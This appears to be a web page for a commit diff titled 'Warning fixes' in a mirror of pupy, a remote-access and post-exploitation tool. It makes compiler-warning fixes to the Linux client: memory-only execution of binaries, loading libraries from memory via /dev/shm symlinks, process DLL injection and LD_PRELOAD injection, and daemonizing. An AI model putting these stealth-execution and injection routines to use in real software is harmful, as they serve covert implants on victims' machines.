Rooba
/
pupy
mirror of https://github.com/n1nj4sec/pupy.git
1
1
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Warning fixes

This commit is contained in:
Oleksii Shevchuk 2017-04-03 19:40:20 +03:00
parent 07c433022c
commit 6a15067115
11 changed files with 53 additions and 52 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
client/lzma/lzmaunpack.c
View File

@ -7,13 +7,12 @@ static void _lzfree(void *p, void *address) { p = p; free(address); }
static ISzAlloc _lzallocator = { _lzalloc, _lzfree };
static void *lzmaunpack(const char *data, size_t size, size_t *puncompressed_size) {
char *uncompressed = NULL;
unsigned char *uncompressed = NULL;
size_t uncompressed_size = 0;
const Byte *wheader = data + sizeof(unsigned int);
const Byte *woheader = wheader + LZMA_PROPS_SIZE;
const Byte *wheader = (Byte *) data + sizeof(unsigned int);
const Byte *woheader = (Byte *) wheader + LZMA_PROPS_SIZE;
CLzmaDec state;
ELzmaStatus status;
size_t srcLen;
int res;

4
client/sources-linux/Makefile
View File

@ -1,6 +1,6 @@
CC ?= gcc
CFLAGS := $(shell pkg-config --cflags python-2.7) -I../lzma -fPIC $(CFLAGS_EXTRA)
CFLAGS := $(shell pkg-config --cflags python-2.7) -I../lzma -fPIC $(CFLAGS_EXTRA) -pipe -Wall
LDFLAGS := -lpthread -ldl -fPIC $(LDFLAGS_EXTRA) -Wl,-Bstatic -lz -Wl,-Bdynamic
PFLAGS := -OO
PIE ?= -pie
@ -19,7 +19,7 @@ NAME := 86
endif
LINUX_INJECT_CFLAGS := -include debug.h -include fixes.h \
-Dmain=linux_inject_main "-Drealpath=realpath2"
-Dmain=linux_inject_main "-Drealpath=fakepath"
ifneq ($(DEBUG),)
DEBUG_ADD := -debug

1
client/sources-linux/daemonize.c
View File

@ -1,3 +1,4 @@
#define _GNU_SOURCE
#include <stdlib.h>
#include <sys/types.h>
#include <sys/wait.h>

3
client/sources-linux/decompress.c
View File

@ -9,7 +9,6 @@ int decompress(int fd, const char *buf, size_t size) {
int ret;
unsigned have;
z_stream strm;
unsigned char in[CHUNK];
unsigned char out[CHUNK];
/* allocate inflate state */
@ -29,7 +28,7 @@ int decompress(int fd, const char *buf, size_t size) {
if (strm.avail_in == 0)
break;
strm.next_in = buf;
strm.next_in = (unsigned char *) buf;
buf += strm.avail_in;
size -= strm.avail_in;

12
client/sources-linux/fixes.h
View File

@ -1,7 +1,8 @@
#ifndef ___FIXES_H
#define ___FIXES_H
#include <linux/limits.h>
#include <string.h>
#include <sys/ptrace.h>
#ifndef PTRACE_GETSIGINFO
@ -9,8 +10,13 @@
#endif
static inline
char *realpath2(const char *path, char *resolved_path) {
return path;
char *fakepath(const char *path, char *resolved_path) {
if (resolved_path) {
strncpy(resolved_path, path, PATH_MAX);
return resolved_path;
} else {
return strdup(path);
}
}
#endif

1
client/sources-linux/list.c
View File

@ -252,7 +252,6 @@ bool list_remove(PLIST pList, void * data)
bool list_delete(PLIST pList, unsigned int index)
{
bool result = false;
void * data = NULL;
PNODE current_node = NULL;
if (pList == NULL)

4
client/sources-linux/main_exe.c
View File

@ -1,9 +1,13 @@
#include "pupy_load.h"
#include "daemonize.h"
#include <mcheck.h>
int main(int argc, char *argv[], char *env[]) {
#ifndef DEBUG
daemonize(argc, argv, env, true);
#else
mtrace();
#endif
return mainThread(argc, argv, false);
}

25
client/sources-linux/pupy.c
View File

@ -13,6 +13,7 @@
#include <arpa/inet.h>
#include "tmplibrary.h"
#include <sys/mman.h>
#include <sys/prctl.h>
#include "memfd.h"
#include "resources_library_compressed_string_txt.c"
@ -21,7 +22,7 @@ int linux_inject_main(int argc, char **argv);
static const char module_doc[] = "Builtins utilities for pupy";
static const char pupy_config[32768]="####---PUPY_CONFIG_COMES_HERE---####\n";
static const char pupy_config[32764]="####---PUPY_CONFIG_COMES_HERE---####\n";
static PyObject *ExecError;
@ -36,7 +37,7 @@ static PyObject *Py_get_modules(PyObject *self, PyObject *args)
resources_library_compressed_string_txt_size
);
munmap(resources_library_compressed_string_txt_start,
munmap((char *) resources_library_compressed_string_txt_start,
resources_library_compressed_string_txt_size);
Py_XINCREF(modules);
@ -50,9 +51,10 @@ Py_get_pupy_config(PyObject *self, PyObject *args)
{
static PyObject *config = NULL;
if (!config) {
size_t compressed_size = ntohl(
*((unsigned int *) pupy_config)
);
unsigned int pupy_lzma_length = 0x0;
memcpy(&pupy_lzma_length, pupy_config, sizeof(unsigned int));
ssize_t compressed_size = ntohl(pupy_lzma_length);
config = PyObject_lzmaunpack(pupy_config+sizeof(int), compressed_size);
@ -107,8 +109,7 @@ static PyObject *Py_ld_preload_inject_dll(PyObject *self, PyObject *args)
ldobject,
PyObject_IsTrue(py_HookExit),
cleanup,
lpCmdBuffer,
ldobject
lpCmdBuffer
);
dprint("Program to execute in child context: %s\n", cmdline);
@ -146,7 +147,6 @@ static PyObject *Py_reflective_inject_dll(PyObject *self, PyObject *args)
uint32_t dwPid;
const char *lpDllBuffer;
uint32_t dwDllLenght;
const char *cpCommandLine;
if (!PyArg_ParseTuple(args, "Is#", &dwPid, &lpDllBuffer, &dwDllLenght))
return NULL;
@ -212,7 +212,6 @@ static PyObject *Py_reflective_inject_dll(PyObject *self, PyObject *args)
static PyObject *Py_load_dll(PyObject *self, PyObject *args)
{
uint32_t dwPid;
const char *lpDllBuffer;
uint32_t dwDllLenght;
const char *dllname;
@ -236,7 +235,7 @@ static PyObject *Py_mexec(PyObject *self, PyObject *args)
return NULL;
Py_ssize_t argc = PySequence_Length(argv_obj);
if (args < 1) {
if (argc < 1) {
PyErr_SetString(ExecError, "Args not passed");
return NULL;
}
@ -259,7 +258,7 @@ static PyObject *Py_mexec(PyObject *self, PyObject *args)
argv[argc] = NULL;
int stdior[3] = { -1, -1, -1 };
pid_t pid = memexec(buffer, buffer_size, argv, stdior, redirected, detach);
pid_t pid = memexec(buffer, buffer_size, (const char **) argv, stdior, redirected, detach);
if (pid < 0) {
PyErr_SetString(ExecError, "Can't execute");
@ -297,9 +296,9 @@ static PyMethodDef methods[] = {
DL_EXPORT(void)
initpupy(void)
{
PyObject *pupy = Py_InitModule3("pupy", methods, module_doc);
PyObject *pupy = Py_InitModule3("pupy", methods, (char *) module_doc);
if (!pupy) {
return NULL;
return;
}
ExecError = PyErr_NewException("pupy.error", NULL, NULL);

14
client/sources-linux/pupy_load.c
View File

@ -65,10 +65,6 @@ uint32_t mainThread(int argc, char *argv[], bool so) {
int rc = 0;
PyObject *m=NULL, *d=NULL, *seq=NULL;
PyObject *mod;
char * ppath;
FILE * f;
uintptr_t cookie = 0;
PyGILState_STATE restore_state;
struct rlimit lim;
@ -89,9 +85,9 @@ uint32_t mainThread(int argc, char *argv[], bool so) {
);
}
munmap(resources_libcrypto_so_start, resources_libcrypto_so_size);
munmap(resources_libssl_so_start, resources_libssl_so_size);
munmap(resources_python27_so_start, resources_python27_so_size);
munmap((char *) resources_libcrypto_so_start, resources_libcrypto_so_size);
munmap((char *) resources_libssl_so_start, resources_libssl_so_size);
munmap((char *) resources_python27_so_start, resources_python27_so_size);
dprint("calling PyEval_InitThreads() ...\n");
PyEval_InitThreads();
@ -155,7 +151,7 @@ uint32_t mainThread(int argc, char *argv[], bool so) {
resources_bootloader_pyc_size
);
munmap(resources_bootloader_pyc_start, resources_bootloader_pyc_size);
munmap((char *) resources_bootloader_pyc_start, resources_bootloader_pyc_size);
if (seq) {
Py_ssize_t i, max = PySequence_Length(seq);
@ -179,5 +175,5 @@ uint32_t mainThread(int argc, char *argv[], bool so) {
PyGILState_Release(restore_state);
Py_Finalize();
dprint("exit ...\n");
return 0;
return rc;
}

32
client/sources-linux/tmplibrary.c
View File

@ -168,14 +168,14 @@ set_cloexec_flag (int desc) {
return fcntl (desc, F_SETFD, oldflags);
}
pid_t memexec(const char *buffer, size_t size, const char *argv[], int stdior[3], bool redirected_stdio, bool detach) {
pid_t memexec(const char *buffer, size_t size, const char* const* argv, int stdior[3], bool redirected_stdio, bool detach) {
dprint("memexec(%p, %ull, %d)\n", buffer, size, redirected_stdio);
char buf[PATH_MAX]={};
int fd = drop_library(buf, PATH_MAX, buffer, size);
if (fd < 0) {
dprint("Couldn't drop executable: %m\n");
return NULL;
return -1;
}
int p_wait[2];
@ -229,8 +229,8 @@ pid_t memexec(const char *buffer, size_t size, const char *argv[], int stdior[3]
close(p_wait[0]);
set_cloexec_flag(p_wait[1]);
fexecve(fd, argv, environ);
execv(buffer, argv);
fexecve(fd, (char *const *) argv, environ);
execv(buffer, (char *const *) argv);
int status = errno;
write(p_wait[1], &status, sizeof(status));
@ -287,14 +287,17 @@ pid_t memexec(const char *buffer, size_t size, const char *argv[], int stdior[3]
return child_pid;
_lbClose3:
if (redirected_stdio)
if (redirected_stdio) {
close(p_stderr[0]); close(p_stderr[1]);
}
_lbClose2:
if (redirected_stdio)
if (redirected_stdio) {
close(p_stdout[0]); close(p_stdout[1]);
}
_lbClose1:
if (redirected_stdio)
if (redirected_stdio) {
close(p_stdin[0]); close(p_stdin[1]);
}
_lbClose0:
if (p_wait[0] > 0)
close(p_wait[0]);
@ -346,17 +349,12 @@ void *memdlopen(const char *soname, const char *buffer, size_t size) {
#ifndef NO_MEMFD_DLOPEN_WORKAROUND
if (is_memfd) {
char *fake_path = tempnam("/dev/shm", NULL);
if (!fake_path) {
fake_path = tempnam("/tmp", NULL);
}
if (fake_path) {
if (!symlink(buf, fake_path)) {
strncpy(buf, fake_path, sizeof(buf)-1);
is_memfd = false;
char fake_path[PATH_MAX] = {};
snprintf(fake_path, sizeof(fake_path), "/dev/shm/memfd:%s", soname);
if (!symlink(buf, fake_path)) {
strncpy(buf, fake_path, sizeof(buf)-1);
is_memfd = false;
}
free(fake_path);
}
}
#endif

2
client/sources-linux/tmplibrary.h
View File

@ -6,7 +6,7 @@
void *memdlopen(const char *soname, const char *buffer, size_t size);
int drop_library(char *path, size_t path_size, const char *buffer, size_t size);
pid_t memexec(const char *buffer, size_t size, const char *argv[], int stdior[3],
pid_t memexec(const char *buffer, size_t size, const char *const* argv, int stdior[3],
bool redirected_stdio, bool detach);
#endif /* TMPLIBRARY_H */